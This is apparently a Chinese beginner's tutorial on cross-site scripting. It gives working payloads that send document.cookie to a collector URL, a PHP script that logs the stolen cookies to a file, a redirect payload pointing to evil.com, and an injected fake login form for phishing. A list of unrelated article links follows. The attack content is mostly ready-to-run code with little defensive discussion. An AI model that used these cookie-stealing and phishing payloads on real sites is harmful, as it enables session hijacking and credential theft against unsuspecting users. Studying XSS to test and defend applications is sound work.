XSS学习(二)
尝试操作Cookie
创建一个cookie,需要提供cookie的名字,值,过期时间和相关路径等
<?php
setcookie('user_id',123);
?>它的作用是创建一个cookie变量user_id,值为123
在开发者工具中输入javascripit:alert(document.cookie)并执行就会弹出当前的cookie信息
获取客户端cookie信息
<script>document.location="http://127.0.0.1/XSS/save_cookie.php?cookie="+document.cookie</script>
<script>new image().src="http://127.0.0.1/XSS/save_cookie.php?cookie="+document.cookie</script>
<script>document.write('<img src="http://127.0.0.1/XSS/save_cookie.php?cookie="+document.cookie+ "width=0 height=0 border=0 />" ');</script>接收cookie信息
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>网络钓鱼
假设网页中存在以下代码
<a href="http://www.baidu.com/">http://www.google.com/</a>访问google的请求将会被定向到baidu
XSS重定向钓鱼(XSS Redirect Phishing)
假设www.test.com上有一处xss:
http://www.test.com/index.php?search=[exploit]那么当exploit为下时,用户将会从当前网站跳转到一个钓鱼网站
http://www.test.com/index.php?search=" '><script>document.location.href="http://www.evil.com/"</script>HTML注入式钓鱼(XSS HTML Inject Phishing)
示例:
http://www.test.com/index.php?search="'<html><head><title>login</title></head><body><div style="text-align: center;"><form method="POST" action="phishing.php" name="form"><br /><br />Login:<br /><input name="login" /><br />password:<br /><input name="password" type="password"><br /><br /><input name="valid" value="OK" type="submit" /><br /></form></div></body></html>效果
XSS学习(二)的更多相关文章
- 第四次:渗透练习,xss学习
xss学习 一.学习目的 初步了解xss攻击,不包括(DOM类型) 二.附加说明 1.xss介绍 https://baike.baidu.com/item/XSS%E6%94%BB%E5%87%BB/ ...
- emberjs学习二(ember-data和localstorage_adapter)
emberjs学习二(ember-data和localstorage_adapter) 准备工作 首先我们加入ember-data和ember-localstorage-adapter两个依赖项,使用 ...
- ReactJS入门学习二
ReactJS入门学习二 阅读目录 React的背景和基本原理 理解React.render() 什么是JSX? 为什么要使用JSX? JSX的语法 如何在JSX中如何使用事件 如何在JSX中如何使用 ...
- TweenMax动画库学习(二)
目录 TweenMax动画库学习(一) TweenMax动画库学习(二) TweenMax动画库学习(三) Tw ...
- Hbase深入学习(二) 安装hbase
Hbase深入学习(二) 安装hbase This guidedescribes setup of a standalone hbase instance that uses the local fi ...
- Struts2框架学习(二) Action
Struts2框架学习(二) Action Struts2框架中的Action类是一个单独的javabean对象.不像Struts1中还要去继承HttpServlet,耦合度减小了. 1,流程 拦截器 ...
- Python学习二:词典基础详解
作者:NiceCui 本文谢绝转载,如需转载需征得作者本人同意,谢谢. 本文链接:http://www.cnblogs.com/NiceCui/p/7862377.html 邮箱:moyi@moyib ...
- Quartz学习--二 Hello Quartz! 和源码分析
Quartz学习--二 Hello Quartz! 和源码分析 三. Hello Quartz! 我会跟着 第一章 6.2 的图来 进行同步代码编写 简单入门示例: 创建一个新的java普通工程 ...
- SpringCloud学习(二):微服务入门实战项目搭建
一.开始使用Spring Cloud实战微服务 1.SpringCloud是什么? 云计算的解决方案?不是 SpringCloud是一个在SpringBoot的基础上构建的一个快速构建分布式系统的工具 ...
随机推荐
- mysql 修改表字段长度
方案一: change ALTER TABLE t1 CHANGE a a VARCHAR(); change 可以用来更改字段名称和类型 ALTER TABLE table_name CHANGE ...
- web前端框架之Vue hello world
[博客园cnblogs笔者m-yb原创,转载请加本文博客链接,笔者github: https://github.com/mayangbo666,公众号aandb7,QQ群927113708] http ...
- Android中的几个基本常用控件
Android 中常用的几大UI控件 1. TextView : 用于在界面中显示一段文本信息 <TextView android:id="@+id/text_view" / ...
- 关于Appium android input manager for Unicode 提示信息
Appium调完输入法后,会弹出 Appium android input manager for Unicode 提示信息相关的提示信息,每次运行如此,如下图 网络上查找一遍,基本解决了,只要在设 ...
- Linux----Github环境搭建
前面介绍了在Windows环境上安转GitHub环境,原本以为打包成jar,发布到Linux不需要再安转Git,但是因为我们使用了Config-Server配置中心,远程配置来启动,所以需要在Linu ...
- unity3d 数据加/解密
[/font]using System.Collections; using System.Text; using System.Security.Cryptography; using System ...
- Introduction to Unity UI
https://www.raywenderlich.com/795-introduction-to-unity-ui-part-1 https://www.raywenderlich.com/794- ...
- Exp0 Kali安装 Week1
20165214 2018-2019-2 <网络对抗技术>Exp0 Kali安装 Week1 任务要求 Kali的下载.安装.共享.软件源. 步骤 1.从Kali的官网下载镜像文件.(直接 ...
- L362 When to Bring up Salary During the Job Interview Process
Money is an awkward topic of conversation for many professionals—even more so when you’re busy tryin ...
- fiddler模拟弱网测试点
弱网: oSession[“request-trickle-delay”] = “300”; 注释的也很明白,Delay sends by 300ms per KB uploaded.上传1KB需要3 ...